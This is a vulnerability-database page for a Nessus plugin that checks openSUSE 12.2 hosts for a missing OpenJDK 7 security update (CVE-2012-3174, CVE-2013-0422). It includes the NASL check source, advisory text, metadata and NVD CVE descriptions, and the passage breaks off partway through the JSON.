ID OPENSUSE-2013-47.NASL Type nessus Reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2014-06-13T00:00:00
Description
java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs and also
severe security issues :
- Security fixes
- S8004933, CVE-2012-3174: Improve MethodHandle interaction with libraries
- S8006017, CVE-2013-0422: Improve lookup resolutions
- S8006125: Update MethodHandles library interactions
- Bug fixes
- S7197906: BlockOffsetArray::power_to_cards_back() needs to handle > 32 bit shifts
- G422525: Fix building with PaX enabled kernels.
- use gpg-offline to check the validity of icedtea tarball
- use jamvm on %arm
- use icedtea package name instead of protected openjdk for jamvm builds
- fix armv5 build
- update to java access bridge 1.26.2
- bugfix release, mainly 64bit JNI and JVM support
- fix a segfault in AWT code - (bnc#792951)
- add openjdk-7-src-b147-awt-crasher.patch
- turn pulseaudio off on pre 11.4 distros
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openSUSE-2013-47.
#
# The text description of this plugin is (C) SUSE LLC.
#
include("compat.inc");
# Registration branch: when `description` is set, the script only declares its
# metadata and leaves through the exit(0) at the end of this block, so none of
# the host checks further down run in that pass.
if (description)
{
script_id(75022);
script_version("1.5");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
# Both CVEs are reported by this one plugin; the advisory text below ties
# CVE-2012-3174 to S8004933 and CVE-2013-0422 to S8006017.
script_cve_id("CVE-2012-3174", "CVE-2013-0422");
script_name(english:"openSUSE Security Update : java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)");
script_summary(english:"Check for the openSUSE-2013-47 patch");
script_set_attribute(
attribute:"synopsis",
value:"The remote openSUSE host is missing a security update."
);
# Advisory text, carried as one multi-line string. The line breaks are part of
# the string value, so keep comments outside the quotes.
script_set_attribute(
attribute:"description",
value:
"java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs and also
severe security issues :
- Security fixes
- S8004933, CVE-2012-3174: Improve MethodHandle
interaction with libraries
- S8006017, CVE-2013-0422: Improve lookup resolutions
- S8006125: Update MethodHandles library interactions
- Bug fixes
- S7197906: BlockOffsetArray::power_to_cards_back() needs
to handle > 32 bit shifts
- G422525: Fix building with PaX enabled kernels.
- use gpg-offline to check the validity of icedtea tarball
- use jamvm on %arm
- use icedtea package name instead of protected openjdk
for jamvm builds
- fix armv5 build
- update to java access bridge 1.26.2
- bugfix release, mainly 64bit JNI and JVM support
- fix a segfault in AWT code - (bnc#792951)
- add openjdk-7-src-b147-awt-crasher.patch
- turn pulseaudio off on pre 11.4 distros"
);
# Reference links: three bugzilla.novell.com entries and the opensuse-updates
# list message for this update.
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.novell.com/show_bug.cgi?id=792951"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.novell.com/show_bug.cgi?id=798324"
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.novell.com/show_bug.cgi?id=798521"
);
script_set_attribute(
attribute:"see_also",
value:"https://lists.opensuse.org/opensuse-updates/2013-01/msg00082.html"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected java-1_7_0-openjdk packages."
);
# CVSS v2 base vector: network access, low complexity, no authentication,
# complete impact on confidentiality, integrity and availability.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
# CVSS v2 temporal vector: exploitability high (E:H), official fix available
# (RL:OF), report confirmed (RC:C).
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
# Exploit-maturity flags: public exploits, coverage in the Core, Metasploit and
# CANVAS frameworks, and use by malware are all recorded as true. A finding
# from this plugin is therefore a patching priority, not a routine update.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Java Applet JMX Remote Code Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'CANVAS');
# plugin_type "local": the check section of this script reads host data from
# knowledge-base items rather than talking to a network service.
script_set_attribute(attribute:"plugin_type", value:"local");
# One package CPE per binary package that the check section tests, followed by
# the OS CPE for openSUSE 12.2.
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debugsource");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-javadoc");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-src");
script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:12.2");
# The patch date (2013/01/18) precedes the plugin date (2014/06/13) by more
# than a year, so this plugin's publication date says nothing about when the
# fix became available.
script_set_attribute(attribute:"patch_publication_date", value:"2013/01/18");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/13");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"SuSE Local Security Checks");
# The four required keys are the same knowledge-base items the check section
# reads. ssh_get_info.nasl is presumably the plugin that populates them.
# NOTE(review): confirm against that script.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Host-side check for openSUSE-2013-47. Every precondition failure leaves
# through audit(); a report is only raised when at least one rpm_check() call
# below returns a true value.
if (!get_kb_item("Host/local_checks_enabled"))
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

release = get_kb_item("Host/SuSE/release");
# A missing release string, or one starting with SLED or SLES, is reported as
# "not openSUSE"; any release other than SUSE12.2 is then rejected separately.
if (isnull(release) || release =~ "^(SLED|SLES)")
  audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE12\.2)$")
  audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "12.2", release);
if (!get_kb_item("Host/SuSE/rpm-list"))
  audit(AUDIT_PACKAGE_LIST_MISSING);

ourarch = get_kb_item("Host/cpu");
if (!ourarch)
  audit(AUDIT_UNKNOWN_ARCH);
if (ourarch !~ "^(i586|i686|x86_64)$")
  audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);

# Reference builds from the advisory, kept as full literals so each package
# string stays greppable. They are checked in the order listed here.
fixed_builds = make_list(
  "java-1_7_0-openjdk-1.7.0.6-3.20.1",
  "java-1_7_0-openjdk-debuginfo-1.7.0.6-3.20.1",
  "java-1_7_0-openjdk-debugsource-1.7.0.6-3.20.1",
  "java-1_7_0-openjdk-demo-1.7.0.6-3.20.1",
  "java-1_7_0-openjdk-demo-debuginfo-1.7.0.6-3.20.1",
  "java-1_7_0-openjdk-devel-1.7.0.6-3.20.1",
  "java-1_7_0-openjdk-devel-debuginfo-1.7.0.6-3.20.1",
  "java-1_7_0-openjdk-javadoc-1.7.0.6-3.20.1",
  "java-1_7_0-openjdk-src-1.7.0.6-3.20.1"
);

# flag counts how many rpm_check() calls returned true. rpm_check() comes from
# rpm.inc; presumably it is true when the installed package is older than the
# reference build. NOTE(review): confirm in rpm.inc.
flag = 0;
foreach fixed_build (fixed_builds)
{
  if (rpm_check(release:"SUSE12.2", reference:fixed_build))
    flag++;
}

if (!flag)
{
  # Nothing flagged: tell "packages tested but not affected" apart from
  # "package not installed at all".
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "java-1_7_0-openjdk");
}
else
{
  # At least one package flagged: raise the finding, attaching the RPM report
  # text only when report_verbosity is above zero.
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
{"id": "OPENSUSE-2013-47.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)", "description": "java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs and also\nsevere security issues :\n\n - Security fixes\n\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n\n - S8006125: Update MethodHandles library interactions\n\n - Bug fixes\n\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle > 32 bit shifts\n\n - G422525: Fix building with PaX enabled kernels.\n\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n\n - use icedtea package name instead of protected openjdk\n for jamvm builds\n\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n\n - bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n\n - add openjdk-7-src-b147-awt-crasher.patch\n\n - turn pulseaudio off on pre 11.4 distros", "published": "2014-06-13T00:00:00", "modified": "2014-06-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/75022", "reporter": "This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=792951", "https://bugzilla.novell.com/show_bug.cgi?id=798324", "https://lists.opensuse.org/opensuse-updates/2013-01/msg00082.html", "https://bugzilla.novell.com/show_bug.cgi?id=798521"], "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "type": "nessus", "lastseen": "2020-06-05T11:12:10", "edition": 18, "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-0422", "CVE-2012-3174"]}, {"type": "seebug", "idList": ["SSV:60585", "SSV:60593", "SSV:77783"]}, {"type": "symantec", "idList": ["SMNTC-57246"]}, {"type": "centos", "idList": ["CESA-2013:0165"]}, {"type": "ubuntu", "idList": ["USN-1693-1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0199-1", "SUSE-SU-2013:0440-1"]}, {"type": "redhat", "idList": ["RHSA-2013:0165", "RHSA-2013:0156", "RHSA-2013:0626"]}, {"type": "cert", "idList": ["VU:625617"]}, {"type": "zdi", "idList": ["ZDI-13-002"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0165"]}, {"type": "nessus", "idList": ["ORACLE_JAVA7_UPDATE11.NASL", "CENTOS_RHSA-2013-0165.NASL", "FEDORA_2013-0868.NASL", "REDHAT-RHSA-2013-0156.NASL", "FEDORA_2013-0888.NASL", "SL_20130116_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "ORACLE_JAVA7_UPDATE11_UNIX.NASL", "FEDORA_2013-0853.NASL", "ORACLELINUX_ELSA-2013-0165.NASL", "REDHAT-RHSA-2013-0165.NASL"]}, {"type": "fedora", "idList": ["FEDORA:B66CF208CD", "FEDORA:4A3812148A", "FEDORA:D68E221277"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803156", "OPENVAS:1361412562310123748", "OPENVAS:803156", "OPENVAS:1361412562310850427", "OPENVAS:1361412562310870889", "OPENVAS:1361412562310865170", "OPENVAS:1361412562310841283", "OPENVAS:1361412562310881564", "OPENVAS:1361412562310881557", "OPENVAS:865170"]}, {"type": "amazon", "idList": ["ALAS-2013-151"]}, {"type": "saint", "idList": ["SAINT:30B6CFDC962268E8CEAB02B936B3AA0D", "SAINT:A4279A54731FBED2154E23C3F5839BB9", 
"SAINT:B859AECDBB7016A3F1E3446FE83018A3", "SAINT:ADBCEB1FB086DA5B935080CE40F6277F", "SAINT:9AD9476D8EB15E21C99160959F48E5D8", "SAINT:E7792D5FC9067F389F8BD984BD06BD44"]}, {"type": "canvas", "idList": ["JAVA_MBEANINSTANTIATOR_FINDCLASS"]}, {"type": "threatpost", "idList": ["THREATPOST:FC1FB8B56F9BBADC1A51E615FCAF0C39", "THREATPOST:8EC50F1755EA55A58BB75546EB1CB667", "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "THREATPOST:BE60E44ECF7AB415C00BABCA0001D0A6", "THREATPOST:D28B11CA5BD698B7DBA755347444B7A2", "THREATPOST:957A3FEFD479E0736CDB1542A4319181", "THREATPOST:191B75DFBFEAFA9F2F649D66191A07C9", "THREATPOST:AFC9652044AAA8085D4A4A3B6D721484", "THREATPOST:B24E4C9E412A2DFD6F2A4933D9F98D62", "THREATPOST:988117842525F1F414002817E6166A11"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28971", "SECURITYVULNS:VULN:12827"]}, {"type": "exploitdb", "idList": ["EDB-ID:24045"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/JAVA_JRE17_JMXBEAN"]}, {"type": "thn", "idList": ["THN:4EAA4FEF21F8E68A90003CC58D6639E2", "THN:B322DFBE39D6B1984ECCA4237D6EB6EB"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119472"]}, {"type": "zdt", "idList": ["1337DAY-ID-20155"]}, {"type": "fireeye", "idList": ["FIREEYE:4F902DE9FF06143FF34DC80FDBD2AC85"]}, {"type": "securelist", "idList": ["SECURELIST:FA58963C07F2F288FA3096096F60BCF3"]}, {"type": "gentoo", "idList": ["GLSA-201401-30"]}], "modified": "2020-06-05T11:12:10", "rev": 2}, "score": {"value": 9.8, "vector": "NONE", "modified": "2020-06-05T11:12:10", "rev": 2}, "vulnersScore": 9.8}, "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-47.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75022);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n\n script_name(english:\"openSUSE Security Update : java-1_7_0-openjdk (openSUSE-SU-2013:0199-1)\");\n script_summary(english:\"Check for the openSUSE-2013-47 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs and also\nsevere security issues :\n\n - Security fixes\n\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n\n - S8006125: Update MethodHandles library interactions\n\n - Bug fixes\n\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle > 32 bit shifts\n\n - G422525: Fix building with PaX enabled kernels.\n\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n\n - use icedtea package name instead of protected openjdk\n for jamvm builds\n\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n\n - bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n\n - add openjdk-7-src-b147-awt-crasher.patch\n\n - turn pulseaudio off on pre 11.4 distros\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=792951\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=798324\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=798521\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-01/msg00082.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_7_0-openjdk packages.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/18\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-debuginfo-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-debugsource-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-demo-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-demo-debuginfo-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-devel-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-devel-debuginfo-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", 
reference:\"java-1_7_0-openjdk-javadoc-1.7.0.6-3.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"java-1_7_0-openjdk-src-1.7.0.6-3.20.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_7_0-openjdk\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "75022", "cpe": ["p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel-debuginfo", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debugsource", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-devel", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-demo-debuginfo", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-src", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-javadoc", "p-cpe:/a:novell:opensuse:java-1_7_0-openjdk-debuginfo", "cpe:/o:novell:opensuse:12.2"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T12:06:05", "description": "Unspecified vulnerability in Oracle Java 7 before Update 11 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2013-0422. NOTE: some parties have mapped CVE-2012-3174 to an issue involving recursive use of the Reflection API, but that issue is already covered as part of CVE-2013-0422. This identifier is for a different vulnerability whose details are not public as of 20130114.", "edition": 3, "cvss3": {}, "published": "2013-01-14T22:55:00", "title": "CVE-2012-3174", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3174"], "modified": "2014-02-21T04:52:00", "cpe": ["cpe:/a:oracle:jdk:1.7.0", "cpe:/a:oracle:jre:1.7.0"], "id": "CVE-2012-3174", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3174", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update9:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update9:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:jdk:1.7.0:update10:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update7:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update7:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update10:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:45:53", "description": "Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remote attackers to execute arbitrary code by (1) using the public getMBeanInstantiator method in the JmxMBeanServer class to obtain a reference to a private MBeanInstantiator object, then retrieving arbitrary Class references using the findClass method, and (2) using the Reflection API with recursion in a way that bypasses a security check by the java.lang.invoke.MethodHandles.Lookup.checkSecurityManager method due to the inability of the sun.reflect.Reflection.getCallerClass method to skip frames related to the new reflection API, as exploited in the wild in January 2013, as demonstrated by Blackhole and Nuclear Pack, and a different vulnerability than CVE-2012-4681 and CVE-2012-3174. NOTE: some parties have mapped the recursive Reflection API issue to CVE-2012-3174, but CVE-2012-3174 is for a different vulnerability whose details are not public as of 20130114. CVE-2013-0422 covers both the JMX/MBean and Reflection API issues. NOTE: it was originally reported that Java 6 was also vulnerable, but the reporter has retracted this claim, stating that Java 6 is not exploitable because the relevant code is called in a way that does not bypass security checks. NOTE: as of 20130114, a reliable third party has claimed that the findClass/MBeanInstantiator vector was not fixed in Oracle Java 7 Update 11. 
If there is still a vulnerable condition, then a separate CVE identifier might be created for the unfixed issue.\nPer: http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html\r\n\r\n'Note: JDK and JRE 6, 5.0 and 1.4.2, and Java SE Embedded JRE releases are not affected.'", "edition": 3, "cvss3": {}, "published": "2013-01-10T21:55:00", "title": "CVE-2013-0422", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0422"], "modified": "2014-02-21T04:56:00", "cpe": ["cpe:/a:oracle:jdk:1.7.0", "cpe:/a:oracle:jre:1.7.0"], "id": "CVE-2013-0422", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update9:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update9:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update10:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update7:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", 
